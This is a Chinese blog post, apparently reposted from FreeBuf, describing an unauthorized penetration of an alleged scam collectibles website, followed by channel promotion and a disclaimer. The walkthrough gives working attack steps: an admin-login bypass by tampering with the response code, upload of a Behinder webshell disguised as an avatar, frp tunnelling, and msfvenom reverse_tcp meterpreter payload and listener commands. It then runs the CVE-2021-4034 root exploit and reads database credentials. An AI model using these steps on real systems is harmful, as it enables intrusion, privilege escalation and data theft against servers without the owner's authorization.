实战 | 杀猪盘渗透测试
2022-10-8 12:22:42 Author: 渗透安全团队(查看原文) 阅读量:41 收藏

这是一个主打数字藏品的网站元宇宙妥妥的割韭菜,关于这个网站也是无意间找到的。

看起来非常假的网站这个网站是没有cdn的用的是thinkphpk框架搭建的。

先打一波poc没有效果,

访问一下后台直接在url后面加/admin。

一个开源的cms还没有验证码尝试用burp进行爆破,首先在火狐上设置代理ip为127.0.0.1代理端口为8081。

Burp上也要设置端口为8081,将Intercept设置为on输入账号密码点击登录就能拦截到数据包。

在爆破之前先发送到Repeater模块发送看看反应。

用户不存在返回code为1的响应码,尝试拦截返回包把1改为0。

成功登录后台,这应该是个前端js验证非常的不安全。

尝试找上传点,点击用户管理-编辑-上传头像,上传一张jpg文件在用burp抓包改为php将内容改为冰蝎马。
成功上传链接冰蝎马。

想办法上线到msf提权,这里就使用frp内网穿透,在我的vps开启frp。
./frps -c frps.ini

在内网上的kali进行设置
设置配置文件将8000端口的流量转到kali的6666端口。
启动客户端
./frpc -c frpc.ini

生成msf木马ip和端口要填vps的
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=****  LPORT=8000  -f elf > shell.elf
这里的lhost 应为服务器地址 LPORT 为反向代理端口,将shell.elf上传到/www/wwwroot/目录设置权限为777。

打开msf进行监听
use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 127.0.0.1set lport 6666exploit
运行shell.elf
./shell.elf

成功返回会话。

使用模块run post/multi/recon/local_exploit_suggester进行漏洞查询。

使用cve-2021-4034提权,切换到linux shell下面然后进到/tmp目录下下载脚本。
git clone https://github.com/berdav/CVE-2021-4034.git

似乎不行卡住了直接上传上去吧。
upload /home/kali/Desktop/CVE-2021-4034 /tmp/进入shellcd /tmpmakechmod 777 cve-2021-4034./cve-2021-4034
返回root权限。

查看database.php文件链接数据库发现基本上也没有人充值,看到一个账号40w的就是这家所谓数字藏品公司的老总。

登进入尝试提现均提示账户金额异常看来是跑路了,加了它们的官方群进入一看全是讨钱的
在这里提醒一下各位这种所谓的数字藏品都是骗局根本提不出来钱的。

作者:一点我爱你110, 转载自FreeBuf.COM

星 球 免 费 福 利

 转发公众号本文到朋友圈

 截图到公众号后台第1、3、5名获取免费进入星球

星球的最近主题和星球内部工具一些展示

欢 迎 加 入 星 球 !

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247493427&idx=1&sn=7bb3a8c504c2871022106b29aa9df3da&chksm=c1761a9cf601938a815e211d6837bd033949ba33de0ddeee929529f9637040be0fbedbcd4227#rd
如有侵权请联系:admin#unsafe.sh